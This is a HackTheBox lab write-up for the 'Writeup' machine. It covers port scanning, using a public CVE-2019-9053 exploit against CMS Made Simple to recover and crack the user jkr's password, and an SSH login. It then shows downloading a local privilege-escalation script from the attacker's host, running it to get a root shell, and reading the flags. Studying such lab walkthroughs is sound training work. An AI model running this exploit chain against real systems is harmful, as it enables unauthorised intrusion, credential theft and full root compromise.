---
title: HackTheBox-Writeup
author: Crazyinside
layout: true
categories: HackTheBox
cover: https://www.worldisend.com/img/Writeup.png
tags:
  - Linux
---
```
Crazy:~/HackThebox/Writeup$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.138
[sudo] crazyinside 的密码:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-08-22 01:11:31 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.138
Discovered open port 80/tcp on 10.10.10.138

Crazy:~/HackThebox/Writeup$ sudo nmap -sC -sV 10.10.10.138 -p22,80 -oN Writeup
[sudo] crazyinside 的密码:
Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-08-22 09:13 CST
Nmap scan report for 10.10.10.138
Host is up (0.20s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 dd5310700bd0470ae27e4ab6429823c7 (RSA)
|   256 372e1468aeb9c2342b6ed992bcbfbd28 (ECDSA)
|_  256 93eaa84042c1a83385b35600621ca0ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/writeup/
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.77 seconds
zsh: segmentation fault  sudo nmap -sC -sV 10.10.10.138 -p22,80 -oN Writeup
```
```
Crazy:~/HackThebox/Writeup$ curl http://10.10.10.138/robots.txt
#              __
#      _(\    |@@|
#     (__/\__ \--/ __
#        \___|----|  |   __
#            \ }{ /\ )_ / _\
#            /\__/\ \__O (__
#           (--/\--)    \__/
#           _)(  )(_
#          `---''---`
#
# Disallow access to the blog until content is finished.
User-agent: *
Disallow: /writeup/
Crazy:~/HackThebox/Writeup$
```
```
Crazy:~/HackThebox/Writeup$ whatweb http://10.10.10.138/writeup/
http://10.10.10.138/writeup/ [200 OK] Apache[2.4.25], CMS-Made-Simple, Cookies[CMSSESSID9d372ef93962], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[10.10.10.138], MetaGenerator[CMS Made Simple - Copyright (C) 2004-2019. All rights reserved.], Title[Home - writeup]
```
whatweb gives no more precise version information than this.
```
Crazy:~/HackThebox/Writeup$ searchsploit CMS Made Simple
---------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                          |  Path
---------------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)      | php/remote/46627.rb
CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting                                 | php/webapps/26298.txt
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion                                 | php/webapps/26217.html
CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting                              | php/webapps/29272.txt
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection                                  | php/webapps/29941.txt
CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities                 | php/webapps/32668.txt
CMS Made Simple 1.11.9 - Multiple Vulnerabilities                                       | php/webapps/43889.txt
CMS Made Simple 1.2 - Remote Code Execution                                             | php/webapps/4442.txt
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection                                    | php/webapps/4810.txt
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload                        | php/webapps/5600.php
CMS Made Simple 1.4.1 - Local File Inclusion                                            | php/webapps/7285.txt
CMS Made Simple 1.6.2 - Local File Disclosure                                           | php/webapps/9407.txt
CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting                     | php/webapps/33643.txt
CMS Made Simple 1.6.6 - Multiple Vulnerabilities                                        | php/webapps/11424.txt
CMS Made Simple 1.7 - Cross-Site Request Forgery                                        | php/webapps/12009.html
CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion                           | php/webapps/34299.py
CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery                 | php/webapps/34068.html
CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection          | php/webapps/48944.py
CMS Made Simple 2.1.6 - Multiple Vulnerabilities                                        | php/webapps/41997.txt
CMS Made Simple 2.1.6 - Remote Code Execution                                           | php/webapps/44192.txt
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)                          | php/webapps/48779.py
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload                            | php/webapps/48742.txt
CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated)                | php/webapps/48851.txt
CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)                             | php/webapps/49793.txt
CMS Made Simple 2.2.15 - RCE (Authenticated)                                            | php/webapps/49345.txt
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)| php/webapps/49199.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution                           | php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution                           | php/webapps/45793.py
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning                         | php/webapps/39760.txt
CMS Made Simple < 2.2.10 - SQL Injection                                                | php/webapps/46635.py
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload                        | php/webapps/34300.py
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload                   | php/webapps/34298.py
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload          | php/webapps/46546.py
---------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
---------------------------------------------------------------------------------------- ---------------------------------
 Paper Title                                                                            |  Path
---------------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple v2.2.13 - Paper                                                         | docs/english/49947-cms-made-simp
---------------------------------------------------------------------------------------- ---------------------------------
```
The relevant vulnerability is CVE-2019-9053 (the "< 2.2.10 - SQL Injection" entry). The script bundled with searchsploit is written for Python 2 and cannot be used as-is; there is a Python 3 port on GitHub:
https://github.com/4nner/CVE-2019-9053/blob/master/exploit.py

```
./exploit.py -u http://10.10.10.138/writeup --crack --wordlist /usr/share/wordlists/rockyou.txt
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9
```
```
Crazy:~/HackThebox/Writeup$ ssh jkr@writeup.htb
jkr@writeup.htb's password:
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 21 21:49:32 2022 from 10.10.16.5
jkr@writeup:~$ sudo -l
-bash: sudo: command not found
jkr@writeup:~$ cat user.txt
fe...................................
jkr@writeup:~$
jkr@writeup:~$ wget http://10.10.16.3/pwk.py
--2022-08-21 21:51:50--  http://10.10.16.3/pwk.py
Connecting to 10.10.16.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3448 (3.4K) [text/x-python]
Saving to: ‘pwk.py’

pwk.py          100%[=============================================================>]   3.37K  --.-KB/s    in 0.01s

2022-08-21 21:51:51 (236 KB/s) - ‘pwk.py’ saved [3448/3448]

jkr@writeup:~$ ls
pwk.py  sharedvuln  user.txt
jkr@writeup:~$ python pwk.py
  File "pwk.py", line 43
    cargv = (c_char_p * (len(argv) + 1))(*argv, None)
SyntaxError: only named arguments may follow *expression
jkr@writeup:~$ python3 pwk.py
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev),1000(jkr)
# cat /root/root.txt
bf84..............................
#
```